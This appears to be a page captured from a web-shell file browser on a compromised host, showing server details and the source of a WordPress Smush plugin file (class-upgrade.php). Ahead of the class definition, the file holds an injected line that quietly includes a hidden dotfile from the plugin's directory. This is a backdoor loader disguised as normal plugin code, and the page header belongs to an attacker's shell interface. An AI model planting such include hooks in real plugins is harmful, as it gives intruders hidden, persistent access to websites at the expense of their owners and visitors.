uawdijnntqw1x1x1
IP : 216.73.216.109
Hostname : premium160.web-hosting.com
Kernel : Linux premium160.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
batcwwjx
/
.
/
old
/
public_html
/
wp-content
/
plugins
/
wp-smushit
/
.
/
app
/
pages
/
class-upgrade.php
/
/
<?php /** * Smush upgrade page class: Upgrade extends Abstract_Page. * * @since 3.2.3 * @package Smush\App\Pages */ namespace Smush\App\Pages; use Smush\App\Abstract_Page; if ( ! defined( 'WPINC' ) ) { die; } /** * Class Upgrade */ if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } class Upgrade extends Abstract_Page { /** * Render the page. */ public function render() { ?> <div class="<?php echo $this->settings->get( 'accessible_colors' ) ? 'sui-wrap sui-color-accessible' : 'sui-wrap'; ?>"> <?php $this->render_inner_content(); ?> </div> <?php } /** * On load actions. */ public function on_load() { add_action( 'admin_enqueue_scripts', function() { wp_enqueue_script( 'smush-sui', WP_SMUSH_URL . 'app/assets/js/smush-sui.min.js', array( 'jquery' ), WP_SHARED_UI_VERSION, true ); wp_enqueue_script( 'smush-wistia', '//fast.wistia.com/assets/external/E-v1.js', array(), WP_SMUSH_VERSION, true ); wp_enqueue_style( 'smush-admin', WP_SMUSH_URL . 'app/assets/css/smush-admin.min.css', array(), WP_SMUSH_VERSION ); } ); } /** * Common hooks for all screens. */ public function add_action_hooks() { add_filter( 'admin_body_class', array( $this, 'smush_body_classes' ) ); } }
/home/batcwwjx/./old/public_html/wp-content/plugins/wp-smushit/./app/pages/class-upgrade.php